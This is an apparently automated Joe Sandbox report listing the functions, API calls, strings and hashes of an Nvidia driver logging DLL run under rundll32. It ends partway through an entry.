String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
API String ID: 71445658-1403648629
Opcode ID: 168d4153820dfa5bf4347ea5d55fdae4738c1ae759da0c2e42162f5cb4d04536
Instruction ID: e938970583911ced9f9a1444c18600ec72edc4b24a8dbf691f30cc34a41bcc15
Opcode Fuzzy Hash: 168d4153820dfa5bf4347ea5d55fdae4738c1ae759da0c2e42162f5cb4d04536
Instruction Fuzzy Hash: 5111E672718B4681EB148B15F460B6A6360FB46BD4F905232DA6C47BE8CF3CD149CB40

Function 00007FFDFA8B39B8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8B39FC

Part of subcall function 00007FFDFA8B3848: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B38F2
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3915
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3941
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3965
Part of subcall function 00007FFDFA8B3848: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3989

Part of subcall function 00007FFDFA8C3874: throw_exception.LIBCPMT ref: 00007FFDFA8C3900

Strings

c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FFDFA8B3A33
RegOpenKeyEx, xrefs: 00007FFDFA8B3A08
void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FFDFA8B3A3A

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_$Open__std_exception_copythrow_exception
String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
API String ID: 2507522339-1403648629
Opcode ID: 1a8c7a166c5c236a1b3517bfebdfd1d2d6afa2ceb11a7d8eca7fe6af9cdc555c
Instruction ID: 512a6d7e4a45081f020058d2c21c18d60b8c54e137d96abfc7ecdac38f6c99d6
Opcode Fuzzy Hash: 1a8c7a166c5c236a1b3517bfebdfd1d2d6afa2ceb11a7d8eca7fe6af9cdc555c
Instruction Fuzzy Hash: F0110632B18A8381EB14CB25E861BA97360FB85B94F905231DA7C837E8CE7CD146C740

Function 00007FFDFA8AA3F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFDFA8AA3FB
GetProcAddress.KERNEL32 ref: 00007FFDFA8AA40B

Strings

kernel32.dll, xrefs: 00007FFDFA8AA3F4
CreateSymbolicLinkW, xrefs: 00007FFDFA8AA404

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CreateSymbolicLinkW$kernel32.dll
API String ID: 1646373207-1962376091
Opcode ID: 80caedae318dc50190f7938228b55261e8a6763591e7d84b28634753ea436a7e
Instruction ID: 623b595543379b6cdae47edf52b409573501a36c9b1867ec6375b905c25f1e5e
Opcode Fuzzy Hash: 80caedae318dc50190f7938228b55261e8a6763591e7d84b28634753ea436a7e
Instruction Fuzzy Hash: CBD0C928F59A03D1E70C9B51ECE586833B1BF58741FD041B5C56D813B89F2CA69AC710

Function 00007FFDFA8AA3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFDFA8AA3CB
GetProcAddress.KERNEL32 ref: 00007FFDFA8AA3DB

Strings

kernel32.dll, xrefs: 00007FFDFA8AA3C4
CreateHardLinkW, xrefs: 00007FFDFA8AA3D4

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 1646373207-294928789
Opcode ID: 69d15db900f5ea381d2d1439874bf761b1340bd491aac249e4236d0d5bea90ca
Instruction ID: 0d2bcd02f68d3d8ea8a0b186c726339b52195b88e8473069d2b8d835d3650293
Opcode Fuzzy Hash: 69d15db900f5ea381d2d1439874bf761b1340bd491aac249e4236d0d5bea90ca
Instruction Fuzzy Hash: 78D0C928F19A03D1E70C9B51ECE587433B1BF58741FE040B5C56D813B89F2CB69A8380

Function 00007FFDFA96C670 Relevance: 6.1, APIs: 4, Instructions: 126fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFDFA96C6B7
CreateFileW.KERNEL32 ref: 00007FFDFA96C75A
CloseHandle.KERNEL32 ref: 00007FFDFA96C7D2
CloseHandle.KERNEL32 ref: 00007FFDFA96C7DE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CloseFileHandle$AttributesCreate
String ID:
API String ID: 1279197413-0
Opcode ID: e5e6221bda934534c7198b04ffb04633a1afd006daa703f7abc995b6117b968a
Instruction ID: 2d6c698f37df63db9d0ade01702d0f0b9b935da12fd301b6cdc4a492744915d0
Opcode Fuzzy Hash: e5e6221bda934534c7198b04ffb04633a1afd006daa703f7abc995b6117b968a
Instruction Fuzzy Hash: 9651C072B0868282E7148F11E464B7AB3A0FF85BA0F504275EABD87BD9DF3CE0458740

Function 00007FFDFA8C0B90 Relevance: 6.1, APIs: 4, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C0C24

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C0C3E
new.LIBCMT ref: 00007FFDFA8C0C46
new.LIBCMT ref: 00007FFDFA8C0C59

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 3870983325-0
Opcode ID: 1ca6dcd98e4114ac3cc1afa2f7a9bfe9d8bb3bd467ba8e3a3dbdffdcc6aeb81f
Instruction ID: fcc4de7229645032d967c6d40e7693c1fa66599fe928a46dbfc41b434303c275
Opcode Fuzzy Hash: 1ca6dcd98e4114ac3cc1afa2f7a9bfe9d8bb3bd467ba8e3a3dbdffdcc6aeb81f
Instruction Fuzzy Hash: 3031AB72B29A4280EB2C9B15D16097862A09B10BF4B554772CE3D0B7DCDFBCE8928680

Function 00007FFDFA8C1334 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8C13A3
new.LIBCMT ref: 00007FFDFA8C13B9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C1461
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C1467

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: e9bd5bf17153603c1cc4d72c758991d8fa43cc4803fe4520105d2e3d04beb01f
Instruction ID: f241362dca37f73e24a907c897485760b5ef62ef29e01fabcf8cfa9f0bd364f6
Opcode Fuzzy Hash: e9bd5bf17153603c1cc4d72c758991d8fa43cc4803fe4520105d2e3d04beb01f
Instruction Fuzzy Hash: 06313672B14B4585E7188F29D5A07283BA5FB54FE8F814262DF6C07BE9CF78D8528340

Function 00007FFDFA980B20 Relevance: 6.1, APIs: 4, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFDFA980B70
GetSystemInfo.KERNEL32 ref: 00007FFDFA980B87
VirtualAlloc.KERNEL32 ref: 00007FFDFA980BF4
VirtualProtect.KERNEL32 ref: 00007FFDFA980C0E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 04e6aaf630fafe1e3119f71ebd3d1127d44ed31f4638ad15e1e5b99fc79ebe75
Instruction ID: eea8c0fb0fe9ed7b593adb8d08622015a7a95490d95b117bf5126872e755c1ef
Opcode Fuzzy Hash: 04e6aaf630fafe1e3119f71ebd3d1127d44ed31f4638ad15e1e5b99fc79ebe75
Instruction Fuzzy Hash: F6314232714A859EEB24DF35D850BE833A5FB48788F844475DA5E8BB88DE3CD545C740

Function 00007FFDFA8BBE90 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

__RTDynamicCast.LIBVCRUNTIME ref: 00007FFDFA8BBEB8
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8BBF53
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8BBF64
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BBF8E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CastDeallocateDynamicExceptionThrowstd::_std::bad_alloc::bad_alloc
String ID:
API String ID: 3778945295-0
Opcode ID: ed3f7993d6940fec25ca18a392ed494f80fc3faa1b01a45b2ec710e58383ab5b
Instruction ID: c5a36999b92b4f5d6f56e75f8e038ece96b90ff1586a45685e2ec64b93d678a1
Opcode Fuzzy Hash: ed3f7993d6940fec25ca18a392ed494f80fc3faa1b01a45b2ec710e58383ab5b
Instruction Fuzzy Hash: A631CE62B25A4582EB08CF20D4647786361FB84B84F944472DA2C4B7DDDF7CD541C790

Function 00007FFDFA904A64 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA904AAB
new.LIBCMT ref: 00007FFDFA904AC1
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA904AEE
__std_type_info_name.LIBVCRUNTIME ref: 00007FFDFA904B20

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task__std_type_info_name
String ID:
API String ID: 3944659026-0
Opcode ID: a7075b866a24bcf3b15571cfc1dfcf371b87b277aa2fdeed02b664e6736d2e3a
Instruction ID: 0d472f9ad386c0889f711fbaa16f6159f9126b6e61fa090b22a5dfc4d238f058
Opcode Fuzzy Hash: a7075b866a24bcf3b15571cfc1dfcf371b87b277aa2fdeed02b664e6736d2e3a
Instruction Fuzzy Hash: B021D472B19B0681EB08DB25E46067D73A0EB487E4F948631DA7D873CDEF2CD1918300

Function 00007FFDFA8AAB70 Relevance: 6.1, APIs: 4, Instructions: 69libraryCOMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AAC3F
LocalFree.KERNEL32 ref: 00007FFDFA8AAC4B

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ConditionFreeInfoLibraryLoadLocalMaskVerifyVersion
String ID:
API String ID: 3996897175-0
Opcode ID: 7e5fed11087c4326b1762b0ef82043d9a06b0ff3c383ee0b1bfba45b1b089046
Instruction ID: c85dd3e1f7ae64ead4f023c6ab920f183ef8a7e78ce33dcdf67b2cf0540d9a56
Opcode Fuzzy Hash: 7e5fed11087c4326b1762b0ef82043d9a06b0ff3c383ee0b1bfba45b1b089046
Instruction Fuzzy Hash: 38210B32B2854286FB2CDB75E865AF57290AF88B84F444074D92D8B7DDEE3CE1478740

Function 00007FFDFA907B30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00007FFDFA907B9B
std::_Deallocate.LIBCONCRT ref: 00007FFDFA907BC3
std::_Deallocate.LIBCONCRT ref: 00007FFDFA907BD8
std::_Deallocate.LIBCONCRT ref: 00007FFDFA907BED

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: 93e080f88ed689211b9ce7ba41fa0513fdcfe4d07710046eda0ed6fffc96e744
Instruction ID: a9d85415e7760e83150125e66182701366c9084ef6d9cb1f5a33bed818870b10
Opcode Fuzzy Hash: 93e080f88ed689211b9ce7ba41fa0513fdcfe4d07710046eda0ed6fffc96e744
Instruction Fuzzy Hash: 01219FB6715A9188EF588F22D1505ADA331FB84FD0F54D072DAAC4BB8DCF28D8958340

Function 00007FFDFA910F98 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00007FFDFA911003
std::_Deallocate.LIBCONCRT ref: 00007FFDFA91102B
std::_Deallocate.LIBCONCRT ref: 00007FFDFA911040
std::_Deallocate.LIBCONCRT ref: 00007FFDFA911055

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: 3c25c5139425b86a69570f3ea7bfe5f9e35514b2fd4d6475dddec9d8463ea4d5
Instruction ID: 21aec164d765b17fd770cc98feb415fcbb5e3e8cd4248b1d31421ced5abc4235
Opcode Fuzzy Hash: 3c25c5139425b86a69570f3ea7bfe5f9e35514b2fd4d6475dddec9d8463ea4d5
Instruction Fuzzy Hash: B321A1B6719A8198EF18CF12D1506ADA321EB88FC4F549032DA6D47B9DDF29D881C340

Function 00007FFDFA8CE3F8 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CE416
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CE42F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CE45A
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CE4AA

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
